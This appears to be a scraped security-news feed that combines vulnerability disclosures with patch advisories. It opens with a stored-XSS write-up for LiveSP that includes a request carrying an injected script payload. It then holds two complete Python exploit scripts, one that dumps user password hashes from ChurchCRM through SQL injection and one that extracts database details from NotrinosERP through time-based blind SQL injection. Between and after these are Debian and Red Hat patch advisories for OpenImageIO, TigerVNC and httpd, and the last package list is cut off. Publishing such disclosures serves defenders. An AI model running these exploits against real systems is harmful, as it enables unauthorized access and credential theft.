A cross-site scripting (XSS) vulnerability in LiveAction LiveSP v21.1.2 allows attackers to execute arbitrary web scripts or HTML.

**CVE-2023-24721 - Stored Cross-site Scripting (XSS)**

  

**Description**

An issue was discovered in LiveSP through v.21.1.2. A malicious user leveraging this vulnerability could inject arbitrary JavaScript code. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

**POC**

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and are not hindered by web browsers' XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations this can be used to create web application worms that spread exponentially and ultimately exploit all active users.

**Affected Endpoint**

*   **URL:** https://\[ip:port\]/va/service/bach/topology/element
*   **HTTP Post Parameter:** name

**Technical Details**

In this specific instance, using the API available under _/va/service/bach/topology/element_, it is possible to inject arbitrary JavaScript code within the _name_ POST parameter, as shown in the following HTTP Request/Response pair.

**HTTP Request:**

POST /va/service/bach/topology/element HTTP/1.1
Host: \[REDACTED\]
Cookie: \[REDACTED\]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: \[REDACTED\]
X-Customer: \[REDACTED\]
Content-Type: application/json
Content-Length: 175
Origin: \[REDACTED\]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"attributes":{"name":"\\"\><img src\='x' onerror\='alert(\\"pwned\\")'\>","extraLabel":""},"type":"cluster","keyType":"cluster:applicationUser","children":{"neType:application":\[\]}}

**HTTP Response:**

HTTP/1.1 201 Created
Server: \[REDACTED\]
Date: Wed, 04 Jan 2023 13:45:39 GMT
Content-Type: application/json
Content-Length: 902
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers:Accept,Accept-Language,APP-Platform,APP-Version,Content-Disposition,Content-Language,Content-Range,Content-Type,X-Customer,X-Debug,X-MT-Admin,X-UserScope,X-UserToken
Access-Control-Allow-Origin: \*
Referrer-Policy: strict-origin

\[...\]

As we note from the HTTP Response above, the exploit was successfully saved. At this point, when the user visits the _https://\[hostname:port\]/va/cluster_ web page, the exploit runs from the victim’s browser.

**Reference**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24721

CVE-2023-24721: CVE/CVE-2023-24721.md at main · marcovntr/CVE

Debian Linux Security Advisory 5384-1 - Multiple security vulnerabilities have been discovered in OpenImageIO, a library for reading and writing images. Buffer overflows and out-of-bounds read and write programming errors may lead to a denial of service (application crash) or the execution of arbitrary code if a malformed image file is processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5384-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
April 10, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openimageio  
CVE ID         : CVE-2022-36354 CVE-2022-41639 CVE-2022-41649 CVE-2022-41684  
                 CVE-2022-41794 CVE-2022-41837 CVE-2022-41838 CVE-2022-41977  
                 CVE-2022-41981 CVE-2022-41988 CVE-2022-41999 CVE-2022-43592  
                 CVE-2022-43593 CVE-2022-43594 CVE-2022-43595 CVE-2022-43596  
                 CVE-2022-43597 CVE-2022-43598 CVE-2022-43599 CVE-2022-43600  
                 CVE-2022-43601 CVE-2022-43602 CVE-2022-43603  
Debian Bug     : 1027143 1027808

Multiple security vulnerabilities have been discovered in OpenImageIO, a  
library for reading and writing images. Buffer overflows and out-of-bounds  
read and write programming errors may lead to a denial of service  
(application crash) or the execution of arbitrary code if a malformed image  
file is processed.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.2.10.1+dfsg-1+deb11u1.

We recommend that you upgrade your openimageio packages.

For the detailed security status of openimageio please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openimageio

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmQz0zJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeS2VhAAkzf+mdeKhMeJwj6tgMsq3GwyOvvyUwbCNxH31z43l+EX2SSLROOXfp8H  
N9pkxAPmMfkzNR77FFwKFyHmAMeHwQdO+9w4YQ+Bz2h1xs25snwW9k+4BFGvgZfc  
T4RF5l808YGPJWUoxS3EOfgVYAv7nYc/eSxHvLBSW/4uhsg9fzNeTvWbdGVATNDw  
2Fiy2b5uFeo+uBGveyhzd7sj+spe7cYdFklrSAirKA/QAh0cUlRVfP4uyQysO1iT  
/JK3+vXP+Xis7VmRADNLIfK8xnX5maW6Uru6IuHVHHFMqaSBYPw+1BwIfkz0n60A  
VL+wpVZ+eBdN1QM3srizcHfkB4ZuH/XU+NoNmKiCFPdmguwSPubH6NNEtqr4UHew  
29/PMcneOfGzjSf4tQ6Bk4wjhYEUOTiN3UAJ7Nc7xce92iapzzeHbulAMO9nROch  
KOUVyfauOBLWd5UTKSWGhlb/AWwGCBxhqBnumKRFS8t842xxsrMiufZBWM23q0fr  
smxfDs4uxUhmmQI4nCLUTCjLcFz50/flJNDKSTaRh5Vxu26wklxwFu0kFpiSxc2U  
3K6Ku+nH96ydlSjFLfKGP6L3+SPWzxaojpfxqgkjsA81k6/27arvamlZEb4+LC0D  
EuUmUYu9+6OYBmP6Qa/Awy+6tMX9x6DGtn2VOWpvyAD0xprGi0A=  
=mZTJ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5384-1

ChurchCRM version 4.5.1 suffers from a remote authenticated SQL injection vulnerability.

    # Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md# Software Link: https://github.com/ChurchCRM/CRM/releases# Vendor Homepage: http://churchcrm.io/# Version: 4.5.1# Tested on: Windows, Linux# CVE: CVE-2023-24787"""The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter.This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School. The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping.This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.This script is created as Proof of Concept to retrieve the username and password hash from user_usr table."""import sys, requestsdef dumpUserTable(target, session_cookies):        print("(+) Retrieving username and password")    print("")    url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)    headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}                  r = requests.get(url, headers=headers)    lines = r.text.splitlines()        for line in lines:         if "<td >Perseverance" in line:            print(line.split("Perseverance")[1].split("</td>")[0])    def login(target, username, password):    target = "%s/session/begin" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "User=%s&Password=%s" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)               print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")    dumpUserTable(target, session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

ChurchCRM 4.5.1 SQL Injection

NotrinosERP version 0.7 suffers from a remote authentication blind SQL injection vulnerability.

    # Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md# Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7# Vendor Homepage: https://notrinos.com/# Version: 0.7# Tested on: Windows, Linux# CVE: CVE-2023-24788"""The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order.The OrderNumber parameter require a valid orderNumber value.This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application."""import sys, requestsdef injection(target, inj_str, session_cookies):        for j in range(32, 126):        url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j)))        headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}                      r = requests.get(url, headers=headers)        res = r.text        if "NotrinosERP 0.7 - Login" in res:            session_cookies = login(target, username, password)            headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}            r = requests.get(url, headers=headers)        elif (r.elapsed.total_seconds () > 2 ):            return j    return Nonedef login(target, username, password):    target = "%s/index.php" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781')    def retrieveDBName(session_cookies):       db_name = ""    print("(+) Retrieving database name")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_name += chr(retrieved_value)                    else:            break    print("Database Name: "+db_name) def retrieveDBVersion(session_cookies):    db_version = ""    print("(+) Retrieving database version")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_version += chr(retrieved_value)            sys.stdout.flush()        else:            break    print("Database Version: "+db_version)def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)           print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")    retrieveDBName(session_cookies)    print("")    retrieveDBVersion(session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

NotrinosERP 0.7 SQL Injection

Red Hat Security Advisory 2023-1549-01 - Virtual Network Computing is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: tigervnc security update  
Advisory ID:       RHSA-2023:1549-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1549  
Issue date:        2023-04-03  
CVE Names:         CVE-2023-1393   
=====================================================================

1. Summary:

An update for tigervnc is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Virtual Network Computing (VNC) is a remote display system which allows  
users to view a computing desktop environment not only on the machine where  
it is running, but from anywhere on the Internet and from a wide variety of  
machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):

* xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local  
Privilege Escalation Vulnerability (CVE-2023-1393)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180288 - CVE-2023-1393 xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local Privilege Escalation Vulnerability

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.3.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.3.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.3.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.3.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.3.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.3.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1393  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDE1l9zjgjWX9erEAQj8Fg//diYgICEnqTMf1csN3bfDt+nKgiBXRzNO  
/8JZ8pkHelA+x35XpPrvABYiNfnqDd3GZqrKOhBpOME50LsOAy2FsoAu7YVZEpSe  
7NwDzA302hATDoHAcUqMi5FV+RyYb8/IY/MkcUHSK6WbjMB/DOQi9XxSeZYlIyau  
nOUts4A2gb6Bilm2c2lxGOKWbgDidjpTvmV5QPg+IZ5675kVRvjXdKpOOZ0HCsv+  
8IR0DdEmZK29611A/+DebXUYbIvzFJBCjkKiDsy634LxZ8DyaUiUmsxZxFTWZmJT  
xvxZiSM7PD1bEH+v1SZDk8GNIakqyJxd45S6/EPf3d0uOpFGio/7RJIv9HLU5PbG  
uDk9WJdKS7G0Pdy3AV71EY28JW00xe8LlFvIDOlYOYmVNImzylWZcfgn2Lrmrk30  
uFaWXx6chVsWD+j82b8isJsPR/+PAhrv9cGR0iNUoE928eLr84cNI1oCkgG0EvE/  
7DIYuorMOu0RL0emENBlWxjDney9vo7ZbzqcOSREGfBbugGjrYIvKe8OMUvS4fCz  
MKRmeg7jyqg7vlPg4EsrWRJ06F2EMcH/WMqdWoE+FOiZaibih9QY4GoyhOLo938l  
Ywg32HbPRgAMvNEt0gV58xIVfu5Edh249+61F+F4ADLt8VKwoZGhbUyaAQoqUlU9  
mZUEFPgIzvI=  
=ApGa  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1549-01

Red Hat Security Advisory 2023-1670-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: httpd and mod_http2 security update  
Advisory ID:       RHSA-2023:1670-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1670  
Issue date:        2023-04-06  
CVE Names:         CVE-2023-25690   
=====================================================================

1. Summary:

An update for httpd and mod_http2 is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: HTTP request splitting with mod_rewrite and mod_proxy  
(CVE-2023-25690)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176209 - CVE-2023-25690 httpd: HTTP request splitting with mod_rewrite and mod_proxy

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
httpd-2.4.53-7.el9_1.5.src.rpm  
mod_http2-1.15.19-3.el9_1.5.src.rpm

aarch64:  
httpd-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-core-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-devel-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-tools-2.4.53-7.el9_1.5.aarch64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_http2-1.15.19-3.el9_1.5.aarch64.rpm  
mod_http2-debuginfo-1.15.19-3.el9_1.5.aarch64.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.aarch64.rpm  
mod_ldap-2.4.53-7.el9_1.5.aarch64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_lua-2.4.53-7.el9_1.5.aarch64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_session-2.4.53-7.el9_1.5.aarch64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm  
mod_ssl-2.4.53-7.el9_1.5.aarch64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.aarch64.rpm

noarch:  
httpd-filesystem-2.4.53-7.el9_1.5.noarch.rpm  
httpd-manual-2.4.53-7.el9_1.5.noarch.rpm

ppc64le:  
httpd-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-core-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-devel-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-tools-2.4.53-7.el9_1.5.ppc64le.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_http2-1.15.19-3.el9_1.5.ppc64le.rpm  
mod_http2-debuginfo-1.15.19-3.el9_1.5.ppc64le.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.ppc64le.rpm  
mod_ldap-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_lua-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_session-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_ssl-2.4.53-7.el9_1.5.ppc64le.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.ppc64le.rpm

s390x:  
httpd-2.4.53-7.el9_1.5.s390x.rpm  
httpd-core-2.4.53-7.el9_1.5.s390x.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.s390x.rpm  
httpd-devel-2.4.53-7.el9_1.5.s390x.rpm  
httpd-tools-2.4.53-7.el9_1.5.s390x.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_http2-1.15.19-3.el9_1.5.s390x.rpm  
